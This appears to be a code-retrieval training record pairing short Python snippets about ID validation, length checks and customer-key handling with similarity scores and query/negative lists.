self.request.data[keyword] == '':\n return '{} ID cannot be None'.format(keyword)\n \"\"\" Check if <keyword> parameter is > 0 \"\"\"\n if int(self.request.data[keyword]) < 1:\n return '{} ID must be an integer > 0'.format(keyword)", "def test_maxlength():\n assert has_max_length(None, 2) is None\n assert has_max_length('abcd1234', 2)\n assert has_max_length('a', 2) is None", "def validate_length(column_name, value, length):\n valuelength = len(value)\n if valuelength > int(length) >= 0:\n return \"{0} : value '{1}' is greater than the specified length {2}\".format(column_name, value, length)\n elif valuelength < int(length) and int(length) >= 0:\n return \"{0} : value '{1}' is less than the specified length {2}\".format(column_name, value, length)\n\n return None", "def _validate(cls, pid_value):\n blop = re.compile('^[-\\w]+$')\n if not bool(blop.match(pid_value)):\n raise ValidationError(\n 'The ID should contain only letters with numbers or dashes.',\n field_name='id',\n )", "def test_get_uniqueId():\n rep=RentRepository()\n rep.store(\"12\",\"23\",\"1\", \"1\")\n try:\n\n idBook=\"13\"\n idCustomer=\"54\"\n flag=\"1\"\n id=\"1\"\n Validator.get_uniqueId(rep.get_all(),id)\n assert False\n\n except RepositoryExceptionRent as msg:\n assert True", "def verify(s):\n\t# Remove any spurious characters\n\ts = re.sub(r'[^0-9xX]', '', s).upper().strip()\n\n\tl = len(s)\n\n\tif l==10:\n\t\tif verify_10(s):\n\t\t\treturn s\n\telif l==13:\n\t\tif verify_13(s):\n\t\t\treturn s\n\n\t# It's not the right length to be an ISBN\n\treturn False", "def _is_validation(video_id):\n hasher = md5()\n hasher.update(bytes(video_id, 'utf-8'))\n first = hasher.hexdigest()[0]\n return first in ['0', '1']", "def test_minlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'postal_code': '9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': 'B-9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': '905'}\n self.assertFalse(val.validate(document))", "def _generate_cart_id():\n cart_id = ''\n characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()'\n cart_id_length = 50\n for y in range(cart_id_length):\n cart_id += characters[random.randint(0, len(characters) - 1)]\n return cart_id", "def fromOnceID(once_id):\n if not isinstance( once_id, (str) ) or once_id == '':\n return None\n id_split = list(once_id)\n val = 0\n while(len(id_split) > 0):\n char_val = ONCEB50.index( id_split.pop(0) )\n val += char_val * (ONCESIZE ** len(id_split))\n return val", "def test_minlength():\n assert has_min_length(None, 8) is None\n assert has_min_length('abcd1234', 8) is None\n assert has_min_length('a', 8)", "def test_utils_random_string(self, tcex, string_length):\n result = tcex.utils.random_string(string_length=string_length)\n assert (\n len(result) == string_length\n ), f'The length of the string {len(result)} != {string_length}'", "def generate_id(self):\n unique_id = \"\"\n\n while len(unique_id) < self.id_length:\n ascii_number = self.get_random_bits()\n\n if self.is_approved_ascii(ascii_number):\n random_char = chr(ascii_number)\n\n if not self.is_excluded_char(random_char):\n unique_id += chr(ascii_number)\n\n return unique_id", "def my_random_string(string_length=7):\n flag = False\n while flag == False:\n random = str(uuid.uuid4()) # Convert UUID format to a Python string.\n random = random.upper() # Make all characters uppercase.\n random = random.replace(\"-\",\"\") # Remove the UUID '-'.\n my_hash = random[0:string_length]\n duplicate_check = PasswordResetRequest.objects.filter(hash=my_hash)\n if not duplicate_check:\n return my_hash\n break; #although code will never reach here :)", "def test_get_length_of_transcript(self):\n assert self.icd.get_length_of_transcript(\"ENST00000373656\") == 4441\n assert self.icd.get_length_of_transcript(\"ENST00000373654\") == 2045\n assert self.icd.get_length_of_transcript(\"ENST00000337451\") == 3225\n assert self.icd.get_length_of_transcript(\"ENST00000398013\") == 2274" ]
[ "0.70664537", "0.68608546", "0.6378098", "0.6287845", "0.62220454", "0.6160857", "0.6048363", "0.60367453", "0.6018999", "0.59948397", "0.59662354", "0.59309196", "0.5913995", "0.5907712", "0.58846974", "0.58698547", "0.5848623", "0.58164203", "0.5786315", "0.57850075", "0.57811594", "0.57596517", "0.5747777", "0.574281", "0.5740685", "0.572512", "0.57084656", "0.570403", "0.5691527", "0.5672023", "0.56690705", "0.5667142", "0.5640593", "0.5621434", "0.55936", "0.5580656", "0.5580332", "0.557957", "0.5568601", "0.55681664", "0.55674064", "0.55672425", "0.556489", "0.55614084", "0.55572444", "0.55403346", "0.55389017", "0.5535977", "0.55225205", "0.55215055", "0.55181473", "0.55176985", "0.5514764", "0.5513978", "0.55099434", "0.54981136", "0.54857665", "0.54804945", "0.54791605", "0.5469561", "0.5460033", "0.54599094", "0.54490364", "0.54394186", "0.5438826", "0.5432116", "0.54244494", "0.5422934", "0.5402576", "0.54022706", "0.5395745", "0.5395507", "0.53935057", "0.5390733", "0.538767", "0.538664", "0.5386381", "0.5381631", "0.53774834", "0.5372438", "0.5356957", "0.53546864", "0.5348569", "0.534652", "0.5346459", "0.5341466", "0.5333561", "0.5333119", "0.5330498", "0.5329882", "0.53235656", "0.5303961", "0.52961844", "0.5290879", "0.5288708", "0.52849585", "0.52845645", "0.52817875", "0.52815473", "0.527852", "0.5278165" ]
0.0
-1
Check length of PaytureId (len= 51)
def test_43(self): assert 'False' == Api.requestBlock('test-43')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def validateID(id):\n\n if re.compile('[0-9]+').match(id) == None:\n output.completeOutputError(InvalidArgumentCount(descape =\"'%s' is not a valid Id. ID should be numeric with Length = '%s' \" \n\t\t\t% (id, lib.constants._ATTR_ID_LENGHT)))\n return -1\n else:\n # Check for the lenght \n counter = 0\n for char in id:\n counter += 1\n print counter , lib.constants._ATTR_ID_LENGHT\n if counter > lib.constants._ATTR_ID_LENGHT :\n output.completeOutputError(InvalidArgumentCount(descape =\"'%s' exceeded the given length i.e Max Length = '%s'\" % \n\t\t\t(id, lib.constants._ATTR_ID_LENGHT)))\n return -1\n else:\n return 0\n return 0", "def test_get_shortuuid_specific_length(self):\n id = get_shortuuid(length=10)\n self.assertTrue(len(id) == 10)", "def validate_uuid(self, uuid_to_check):\r\n if re.fullmatch(BASE62_REGEX, uuid_to_check):\r\n return 20 <= len(uuid_to_check) <= 22\r\n else:\r\n return False", "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def checkLength(ish, length):\n if ish == \"Visa\":\n ok = (13,16)\n elif ish == \"American Express\":\n ok = (15,)\n elif ish == \"MasterCard\":\n ok = (16,)\n elif ish == \"Discover/Novus\":\n ok = (16,)\n else:\n raise TypeError, \"unknown issuer\"\n return length in ok", "def payment_id_lengths(self) -> Set[int]:", "def payment_id_leading(self) -> bool:", "def confirm_resdic_chainid_length(params):\n resdic_params = (p for p in params if p.startswith('resdic_'))\n for param in resdic_params:\n chainid = param.split('_')[-1]\n if len(chainid) > 1:\n raise ValueError(\n f\"We found the parameter {param!r} which has \"\n \"more than one character in the chain \"\n \"identifier. Chain IDs should have only one character.\"\n )", "def LengthTest(arr):\n\tif len(arr) == 8:\n\t\treturn True;\n\telif len(arr) == 7:\n\t\treturn IsMissingField('cid', arr)\n\telse:\n\t\treturn False", "def __len__(self):\n return len(self.token2id)", "def checkValidId(self, id, prep_id = False):\n # RRD docs say that limit on vnames is 255 characters and that\n # A-Za-z0-9_ are the valid characters. Zenoss reserves - for it's own\n # use. Limiting to 200 instead just to leave room for whatever.\n # http://oss.oetiker.ch/rrdtool/doc/rrdgraph_data.en.html\n if len(id) > 200:\n return 'GraphPoint names can not be longer than 200 characters.'\n allowed = set(string.ascii_letters + string.digits + '_')\n attempted = set(id)\n if not attempted.issubset(allowed):\n return 'Only letters, digits and underscores are allowed' + \\\n ' in GraphPoint names.'\n return ZenModelRM.checkValidId(self, id, prep_id)", "def isValid(t_id):\n\tstr_id=str(t_id).strip()\n\treturn str_id.isdigit()", "def is_valid(self):\n if len(self) <= 64 and re.match(RE_VALID_UID, self):\n return True\n\n return False", "def max_length(verifield, required):\n if verifield is None: return True\n return len(verifield) <= required", "def test_get_shortuuid_uuid(self):\n id = get_shortuuid()\n self.assertTrue(len(id) == 22)", "def test_length(self):\n form_data = self.form_data('c897B$eH@')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def test_length(self):\n for length in range(2, 30):\n self.assertEqual(len(generate_password(length)), length)", "def test_valid_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def checkPacketLength(self):\n return self.packetLength == len(self) - PRIMARY_HEADER_BYTE_SIZE - 1", "def len12(self, len): # -> None:\n ...", "def test_invalid_numeric_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == parameter_is_too_long_msg.format('sender_id')", "def validate_crx_id(crx_id):\n try:\n assert isinstance(crx_id, str)\n assert crx_id.isalnum()\n assert len(crx_id) == 32\n except AssertionError:\n raise MalformedExtId", "def _validate_bbg_id(x):\n return len(x) == 12 and x[:3] == 'BBG' and str.isalnum(x[3:11]) and sum(map(\n lambda u: u in ['A', 'E', 'I', 'O', 'U'], x[3:11])) == 0 and str.isdigit(x[11])", "def vet_pdb_id(pdbid):\n if len(pdbid) < 4 or not \\\n pdbid.isalnum() or not \\\n re.match(r'^[0-9][A-Za-z0-9]{3}$', pdbid):\n return False\n return True", "def test_rfc_nickkey_length(s):\n assert len(util.rfc_nickkey(s)) == len(s)", "def checkValidId(self, id, prep_id = False):\n new_id = unquote(id)\n if prep_id: new_id = self.prepId(id)\n try:\n globalCheckValidId(self, new_id)\n return True\n except Exception:\n return str(sys.exc_info()[1])", "def validateIOmoduleId(output ,arg_dict , key):\n id = arg_dict[key]\n counter = 0\n for char in id:\n counter += 1\n if re.compile('[0-9]+').match(char[0]) == None:\n output.completeOutputError(InvalidArgumentCount(descape =\"'%s'='%s' is not a valid Id. \\n ID should be numeric \" % (key,id))) \n return None\n if counter > lib.constants._ATTR_ID_LENGHT:\n output.completeOutputError(InvalidArgumentCount(descape =\"'%s'='%s' is not a valid Id. \\n ID should be numeric with Length = '%s' \" % (key,id, lib.constants._ATTR_ID_LENGHT)))\n return None\n return arg_dict", "def check_length(length):\n if length > lengthLimit:\n err_str = \"The length value (%s) is higher than the \" % (length)\n err_str += \"limit length (%s)\" % (lengthLimit)\n raise ValueError(err_str)", "def test_has_correct_length(self) -> None:\n assert len(list(ccc.CompoundingConversationDataset())) == 131569", "def id_check(employee_id):\r\n# badge_pattern = re.compile('[A-Za-z]{2}-\\d{4}')\r\n# re.search(badge_pattern, employee_id)\r\n\r\n # if statement\r\n if not re.match('[A-Z]{2}-\\d{4}', employee_id):\r\n print(employee_id, 'is not a valid ID.')", "def test_valid_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def check_id(self, id):", "def validate_identifier(identifier: str) -> bool:\n if identifier[:2] == 'NR':\n return True\n\n if len(identifier) < 9:\n return False\n\n try:\n d = int(identifier[-7:])\n if d == 0:\n return False\n except ValueError:\n return False\n # TODO This is not correct for entity types that are not Coops\n if identifier[:-7] not in ('CP', 'XCP', 'BC'):\n return False\n\n return True", "def test_40_phonenumbers_too_long(self):\n number_phone = self.samples[4]\n with self.assertRaises(osv.except_osv):\n self.pn._symbol_set_char(number_phone)", "def fill_id(id):\n if len(str(id)) < 7:\n length = len(str(id))\n id = \"0\"*(7 - length) + str(id)\n return str(id)", "def validateVfabric(output ,arg_dict, key):\n id = arg_dict[key]\n counter = 0\n for char in id:\n counter += 1\n if re.compile('[0-9]+').match(char[0]) == None:\n output.completeOutputError(InvalidArgumentCount(descape =\"'%s' = '%s' is not a valid Id. ID should be numeric \" % \n\t\t\t\t(key,id)))\n return None\n if counter > lib.constants._ATTR_ID_LENGHT:\n\t output.completeOutputError(InvalidArgumentCount(descape =\"'%s'='%s' is not a valid Id. \\n ID should be numeric with Length = '%s' \" % (key,id, lib.constants._ATTR_ID_LENGHT)))\n return None\n return arg_dict", "def bad_substring_check_account(self, google_ads_account_id):\n pass", "def is_valid_node_id(val):\n if not val:\n return False\n if not isinstance(val, bytes) and not isinstance(val, bytearray):\n return False\n\n length = len(val)\n if length != SHA1_BIN_LEN and length != SHA2_BIN_LEN and \\\n length != SHA3_BIN_LEN:\n return False\n\n return True", "def test_has_correct_length(self) -> None:\n assert len(list(ccc.ConversationDataset())) == 7168", "def check4Id(self, element):\n if self.__identifier in element.attrib:\n return True\n else:\n return False", "def is_id_valid(id_code: str) -> bool:\n if is_valid_gender_number(int(id_code[0:1])):\n if is_valid_year_number(int(id_code[1:3])):\n if is_valid_month_number(int(id_code[3:5])):\n if is_valid_day_number(int(id_code[0:1]), int(id_code[1:3]), int(id_code[3:5]), int(id_code[5:7])):\n if is_valid_birth_number(int(float(id_code[7:10]))):\n if is_valid_control_number(id_code):\n return True\n else:\n return False\n else:\n return False\n\n else:\n return False\n else:\n return False\n else:\n return False", "def test_split_id_otp(self):\n public_id, otp, = pyhsm.yubikey.split_id_otp(\"ft\" * 16)\n self.assertEqual(public_id, '')\n self.assertEqual(otp, \"ft\" * 16)\n\n public_id, otp, = pyhsm.yubikey.split_id_otp(\"cc\" + \"ft\" * 16)\n self.assertEqual(public_id, 'cc')\n self.assertEqual(otp, \"ft\" * 16)", "def _matchLength(self, length: int):\n return self._comparator['Length'] < length", "def _check_subject_id(subject_id):\n if (subject_id and\n len(subject_id) > models.Subject.id.property.columns[\n 0].type.length):\n raise exception.SubjectNotFound()", "def invalid_caterpillar_length(length):\n try:\n length = int(length)\n except ValueError:\n return \"`caterpillar-length` must be something that can be cast to an `int`\"\n\n if not 1 <= length <= len(app.desk.indeces):\n return (\n \"`caterpillar-length` must be a number between \"\n f\"1 and {len(app.desk.indeces)}\"\n )\n\n return False", "def _check_max_length(self, p: list) -> bool:\n\n return (\n len(p[0].split(\" \")) < self.max_length\n and len(p[1].split(\" \")) < self.max_length\n )", "def test_get_length_of_canonical_transcript(self):\n assert self.icd.get_length_of_canonical_transcript(\"ENSG00000171448\") == 4441\n assert self.icd.get_length_of_canonical_transcript(\"ENSG00000140157\") == 3225", "def is_id_valid(id_code: str) -> bool:\n if id_code.isdigit():\n if len(str(id_code)) == 11:\n id_code = str(id_code)\n gender_number = int(id_code[0:1])\n day = int(id_code[5:7])\n month = int(id_code[3:5])\n year = id_code[1:3]\n birth_number = id_code[7:10]\n if is_valid_gender_number(gender_number) \\\n and is_valid_year_number(int(year)) \\\n and is_valid_month_number(int(month)) \\\n and is_valid_day_number(gender_number, int(year), int(month), int(day)) \\\n and is_valid_birth_number(int(birth_number)) \\\n and is_valid_control_number(str(id_code)):\n return True\n return False\n return False\n return False", "def is_valid_pci_class_id(id):\n val = id.replace('0x', '').strip()\n if not is_valid_hex(id):\n return False\n if (len(val) > 6):\n return False\n return True", "def verify_length(src_json):\n error: str = \"\"\n if len(src_json.get(\"LedGroups\", [])) == 0:\n error = \"No or empty LedGroups\"\n if len(src_json.get(\"Sequencers\", [])) == 0:\n error = \"No or empty Sequencers\"\n return error", "def min_length(verifield, required):\n if verifield is None: return True\n return len(verifield) >= required", "def validVarConstructLength(self,varlen):\r\n if len(varlen)!=2:\r\n print 'variable must specify name and type'\r\n return False\r\n else:\r\n return True", "def test_longest_id(self):\r\n ids = \\\r\n \"R27DLI_4812 R27DLI_600 R27DLI_727 U1PLI_403 U1PLI_8969\".split(\r\n )\r\n seqs = dict(parse_fasta(dna_seqs.splitlines(),\r\n label_to_name=label_to_name))\r\n self.assertEqual(longest_id(ids, seqs), 'U1PLI_403')", "def check_len(password_length, alphabet_length, numb_length, symb_length):\r\n return (symb_length + alphabet_length + numb_length) == password_length", "def validate_kf_id(kf_id, prefix='TA'):\n if len(kf_id) != 11 or kf_id[:3] != prefix+'_':\n abort(400, f\"'{kf_id}' is not a valid kf_id\")", "def validate_passport_id(passport_id: str) -> None:\n if RE_PID.match(passport_id) is None:\n raise ValueError(\"Passport ID is not nine decimal digits\")", "def _validate_length(data, min, max, err): # lint-amnesty, pylint: disable=redefined-builtin\n if len(data) < min or len(data) > max:\n raise errors.AccountDataBadLength(err)", "def len23(self, len): # -> None:\n ...", "def check_string_length(string):\n if len(string) > 255:\n sys.exit(\"ERROR: Max permitted string length is 255\")", "def validate_identifier(self, identifier):\n pass", "def check_length(string):\n if 6 < len(string) < 12:\n return True\n\n print(\"Your password is not between 6 and 12 characters\")\n return False", "def generate_id(length: int = 8):\n return \"\".join(random.choices(string.ascii_uppercase, k=length))", "def is_name_length_valid(self) -> bool:\n return 2 < len(self.app_name) <= 35", "def is_id(string):\n regex = re.compile('[0-9a-f]{32}\\Z', re.I)\n if bool(regex.match(string)):\n return True\n\n return False", "def _checkResponseByteCount(payload):\n POSITION_FOR_GIVEN_NUMBER = 0\n NUMBER_OF_BYTES_TO_SKIP = 1\n\n _checkString(payload, minlength=1, description='payload')\n\n givenNumberOfDatabytes = ord(payload[POSITION_FOR_GIVEN_NUMBER])\n countedNumberOfDatabytes = len(payload) - NUMBER_OF_BYTES_TO_SKIP\n\n if givenNumberOfDatabytes != countedNumberOfDatabytes:\n errortemplate = 'Wrong given number of bytes in the response: {0}, but counted is {1} as data payload length is {2}.' + \\\n ' The data payload is: {3!r}'\n errortext = errortemplate.format(givenNumberOfDatabytes, countedNumberOfDatabytes, len(payload), payload)\n raise ValueError(errortext)", "def len_unpadded(self) -> int:", "def check_input_digits_count(self):\n check = len(str(self.input)) == 4\n return check", "def randid(length=12):\n\timport random\n\treturn ''.join(random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for x in range(length))", "def test_maxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'license_plate': 'AF8934'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': '123456'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF893'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF8-934'}\n self.assertFalse(val.validate(document))\n\n document = {'license_plate': 'AF 934'}\n self.assertFalse(val.validate(document))", "def test_id():\n assert Packet40.id == 40", "def PassportIDTest(pid):\n\tif len(pid) == 9:\n\t\tif pid.isdigit():\n\t\t\treturn True\n\treturn False", "def validateId(shortId):\n return shortId in [DockerUtil.getShortId(container) for container in DOCKER_CLIENT.containers.list()]", "def is_valid_passport_id(passport_id: int) -> bool:\n return len(passport_id) == 9 and passport_id.isnumeric()", "def getUIDValidity(self):\n return 42", "def test_check_name_is_3_parts():\n check_name_length()", "def simple_validator(passport):\n if len(passport) == 8:\n return True\n if len(passport) == 7 and \"cid\" not in passport:\n return True\n return False", "def _validate_length(self, value):\n return (self.maximum_length is None) or (len(value) <= self.maximum_length)", "def test_has_correct_length(self) -> None:\n assert len(list(ccc.MessageDataset())) == 138737", "def test_client_ip_max_length(self):\n request = Request.objects.get(id=1)\n max_length = request._meta.get_field('client_ip').max_length\n self.assertEquals(max_length, 100)", "def mobile_len_validator(mobile):\n if len(mobile) != 13:\n raise ValidationError('Invalid mobile len')", "def _is_validation(video_id):\n hasher = md5()\n hasher.update(bytes(video_id, 'utf-8'))\n first = hasher.hexdigest()[0]\n return first in ['0', '1']", "def _create_finding_id(control_id, resource_name, length=20):\n input = control_id + resource_name\n hex = hashlib.sha256(input.encode('UTF-8')).hexdigest()\n result = int(hex, 16) % (10 ** length)\n return str(result)", "def is_order_id_valid(self):\n \n if not self.order_id:\n self.error_message = jsonify({'status':'error', 'message': 'orderId parameter missing'})\n return False\n if not re.match('^[a-f0-9]{32}$', self.order_id):\n self.error_message = jsonify({'status': 'error', 'message': 'orderId must be set to (hex) UUID'})\n return False\n return True", "def check_id(id):\n id = id.strip()\n \n if id and id.isdigit(): # id must only be a number\n return id\n else:\n return None", "def test_valid_luhn(self):\n assert luhn_checksum(\"79927398713\") == 0", "def is_valid_pci_device_vendor_id(id):\n val = id.replace('0x', '').strip()\n if not is_valid_hex(id):\n return False\n if (len(val) > 4):\n return False\n return True", "def Length(self) -> int:", "def Length(self) -> int:", "def _validate_identifier(self, identifier):\n for c in identifier:\n if c not in string.letters + string.digits + '_':\n return False\n return True", "def test_get_length_of_transcript(self):\n assert self.icd.get_length_of_transcript(\"ENST00000373656\") == 4441\n assert self.icd.get_length_of_transcript(\"ENST00000373654\") == 2045\n assert self.icd.get_length_of_transcript(\"ENST00000337451\") == 3225\n assert self.icd.get_length_of_transcript(\"ENST00000398013\") == 2274", "def length_of_name(self, name):\n length = len(name)\n if length > 10:\n self.show_message_when_name_very_long()\n return length", "def test_minlength():\n assert has_min_length(None, 8) is None\n assert has_min_length('abcd1234', 8) is None\n assert has_min_length('a', 8)", "def verify(s):\n\t# Remove any spurious characters\n\ts = re.sub(r'[^0-9xX]', '', s).upper().strip()\n\n\tl = len(s)\n\n\tif l==10:\n\t\tif verify_10(s):\n\t\t\treturn s\n\telif l==13:\n\t\tif verify_13(s):\n\t\t\treturn s\n\n\t# It's not the right length to be an ISBN\n\treturn False", "def validateSN(self, ked):\n sn = ked[\"s\"]\n if len(sn) > 32:\n raise ValidationError(\"Invalid sn = {} too large for evt = {}.\"\n \"\".format(sn, ked))\n try:\n sn = int(sn, 16)\n except Exception as ex:\n raise ValidationError(\"Invalid sn = {} for evt = {}.\".format(sn, ked))\n\n return sn", "def test_minlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'postal_code': '9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': 'B-9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': '905'}\n self.assertFalse(val.validate(document))", "def test_has_correct_length(self) -> None:\n assert len(list(self._dataset)) == 7168", "def _validate(cls, pid_value):\n blop = re.compile('^[-\\w]+$')\n if not bool(blop.match(pid_value)):\n raise ValidationError(\n 'The ID should contain only letters with numbers or dashes.',\n field_name='id',\n )", "def generate_id(self):\n unique_id = \"\"\n\n while len(unique_id) < self.id_length:\n ascii_number = self.get_random_bits()\n\n if self.is_approved_ascii(ascii_number):\n random_char = chr(ascii_number)\n\n if not self.is_excluded_char(random_char):\n unique_id += chr(ascii_number)\n\n return unique_id", "def test_get_uniqueId():\n rep=RentRepository()\n rep.store(\"12\",\"23\",\"1\", \"1\")\n try:\n\n idBook=\"13\"\n idCustomer=\"54\"\n flag=\"1\"\n id=\"1\"\n Validator.get_uniqueId(rep.get_all(),id)\n assert False\n\n except RepositoryExceptionRent as msg:\n assert True", "def __init__(self, length=DEFAULT_ID_LENGTH, excluded_chars=DEFAULT_EXCLUDED_CHARS):\n self.id_length = length\n self.excluded_chars = excluded_chars", "def test_id_centos_7_7(self):\n self.assertEqual(jc.parsers.id.parse(self.centos_7_7_id, quiet=True), self.centos_7_7_id_json)" ]
[ "0.69983447", "0.68838894", "0.6375329", "0.6372531", "0.62937874", "0.62633044", "0.61286795", "0.6075512", "0.60735387", "0.60325694", "0.5966721", "0.5952522", "0.59324026", "0.5905336", "0.58905697", "0.58616316", "0.5856024", "0.58352464", "0.583216", "0.58215785", "0.5816491", "0.581104", "0.5802702", "0.57943374", "0.57598126", "0.57566875", "0.57410175", "0.5737227", "0.57282865", "0.57142174", "0.56757265", "0.5638335", "0.5634978", "0.5615788", "0.56131303", "0.5612519", "0.56065655", "0.5581505", "0.55686027", "0.55626225", "0.5562309", "0.5560139", "0.5558599", "0.555765", "0.5557457", "0.5538825", "0.553538", "0.55321616", "0.55166596", "0.5511475", "0.55055076", "0.5492686", "0.54917526", "0.5488949", "0.54811615", "0.54802626", "0.5468472", "0.54651964", "0.54620415", "0.54608995", "0.5460116", "0.5459854", "0.54572046", "0.54459023", "0.54402107", "0.5436092", "0.54254717", "0.5425391", "0.5424836", "0.5423198", "0.5422093", "0.54149723", "0.5409126", "0.54080594", "0.54076713", "0.5391526", "0.53907275", "0.5387764", "0.5383652", "0.53793985", "0.53773654", "0.537215", "0.5371936", "0.53705204", "0.5364924", "0.536217", "0.53535014", "0.53535014", "0.5348609", "0.53432816", "0.53417563", "0.5341697", "0.53404826", "0.5339914", "0.5335248", "0.5333534", "0.533242", "0.53214395", "0.5320829", "0.5308691", "0.530356" ]
0.0
-1
Send null value in CustomerKey
def test_44(self): assert 'False' == Api.requestBlock('test-44')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _key(self):\n return None", "def key(self):\n return None", "def convert_nulls(dic, null_value):\n for key in dic.iterkeys():\n if dic[key] is None:\n dic[key] = null_value", "def naics_agg_key(record: dict) -> Optional[str]:\n if record[\"naics_code\"] is None:\n return None\n return json.dumps({\"code\": record[\"naics_code\"], \"description\": record[\"naics_description\"]})", "def test_missingKey(self):\n self.assertIsNone(self.users.key(\"mystery domain\", \"mystery user\"))", "def get(self):\n return {'klant': self.customer}", "def __missing__(self, key):\n return key", "def __getitem__(self, key):\n if key.isdigit():\n customer = self.request.db.query(models.Klant).get(key)\n if customer:\n return Customer(self, key, customer=customer)\n raise KeyError", "def __init__(__self__, *,\n customer_managed_key_encryption: Optional[pulumi.Input['ClusterPropertiesCustomerManagedKeyEncryptionArgs']] = None):\n if customer_managed_key_encryption is not None:\n pulumi.set(__self__, \"customer_managed_key_encryption\", customer_managed_key_encryption)", "def get(self, key):\n return \"\"", "def test_key_no_data(self):\n key = Key({})\n\n assert key.warning is None\n assert key.in_car is None", "def _setbeneficiary_customer_no_option_59(self, val):\n self.swift_obj.BeneficiaryCustomer = val\n self.swift_obj.BeneficiaryCustomer.swiftTag = '59'", "def customer_id(self, customer_id: str):\n self._customer_id = customer_id", "def customer_email(customer):\n return customer.get(\"email\")", "def next_customer(self) -> Optional[str]:\n if len(self.priority_customer) > 0:\n return self.priority_customer.pop(0)\n elif len(self.normal_customer) > 0:\n return self.normal_customer.pop(0)\n else:\n return None", "def _remove_nulls(self, params):\n\n if params is not None:\n return {key:value for key, value in params.items() if value is not None}\n\n return {}", "def customer_id(self) -> str:\n return self._customer_id", "def keyEquivalent( self ):\n\t\treturn None", "def prepare_key(self, key):\n return smart_str(key)", "def get_key_id(self):", "def setdefault_key_value(self):\n raise NotImplementedError", "def _key(\n service=None, # type: Optional[str]\n env=None, # type: Optional[str]\n ):\n # type: (...) -> str\n service = service or \"\"\n env = env or \"\"\n return \"service:\" + service + \",env:\" + env", "def key(nullable=True):\n return sa.Column(\n \"key\",\n sa.Text().with_variant(mysql.VARCHAR(255), \"mysql\"),\n nullable=nullable,\n )", "def test_key_none(self):\n try:\n AlphaVantage()\n self.fail(msg='A None api key must raise an error')\n except ValueError:\n self.assertTrue(True)", "def test_key_none(self):\n try:\n AlphaVantage()\n self.fail(msg='A None api key must raise an error')\n except ValueError:\n self.assertTrue(True)", "def nulls_to_empty(dic, *keys):\n if not keys:\n keys = dic.keys()\n for key in keys:\n if dic[key] is None:\n dic[key] = ''\n return None", "def _country_agg_key(location_type, record: dict) -> Optional[str]:\n if record[f\"{location_type}_country_code\"] is None:\n return None\n return json.dumps(\n {\n \"country_code\": record[f\"{location_type}_country_code\"],\n \"country_name\": record[f\"{location_type}_country_name\"],\n }\n )", "def testNoneValue(self):\n objectID = uuid4()\n user = createUser(u'username', u'password', u'User',\n u'user@example.com')\n namespace = createNamespace(user, u'name')\n tag = createTag(user, namespace, u'tag')\n self.store.add(TagValue(user.id, tag.id, objectID, None))", "def test_neg_operate_key_is_none(self):\n llist = [{\"op\": aerospike.OPERATOR_PREPEND, \"bin\": \"name\", \"val\": \"ram\"}]\n try:\n self.as_connection.operate(None, llist)\n\n except e.ParamError as exception:\n assert exception.code == -2", "def recipient_public_key(self):", "def __init__(self, cust_key):\n\n # Call the base class constructor to pass in the base URL\n super().__init__(base_url=\"https://s-platform.api.opendns.com/1.0\")\n\n # Store the API key for use as a query parameters later\n self.auth_params = {\"customerKey\": cust_key}", "def psc_agg_key(record: dict) -> Optional[str]:\n if record[\"product_or_service_code\"] is None:\n return None\n return json.dumps(\n {\"code\": record[\"product_or_service_code\"], \"description\": record[\"product_or_service_description\"]}\n )", "def test_companies_company_id_push_push_operation_key_get(self):\n pass", "def setkey(self, key, value):\n if value == \"\":\n return\n if key == \"agency_id\":\n self.agency_id = value\n elif key == \"agency_name\":\n self.agency_name = value\n elif key == \"agency_url\":\n self.agency_url = value\n elif key == \"agency_timezone\":\n self.agency_timezone = value\n elif key == \"agency_lang\":\n self.agency_lang = value\n elif key == \"agency_phone\":\n self.agency_phone = value\n elif key == \"agency_fare_url\":\n self.agency_fare_url = value\n elif key == \"agency_email\":\n self.agency_email = value\n else:\n raise InvalidKeyError(key)", "def __init__(__self__, *,\n key: pulumi.Input[str],\n user_id: Optional[pulumi.Input[int]] = None):\n pulumi.set(__self__, \"key\", key)\n if user_id is not None:\n 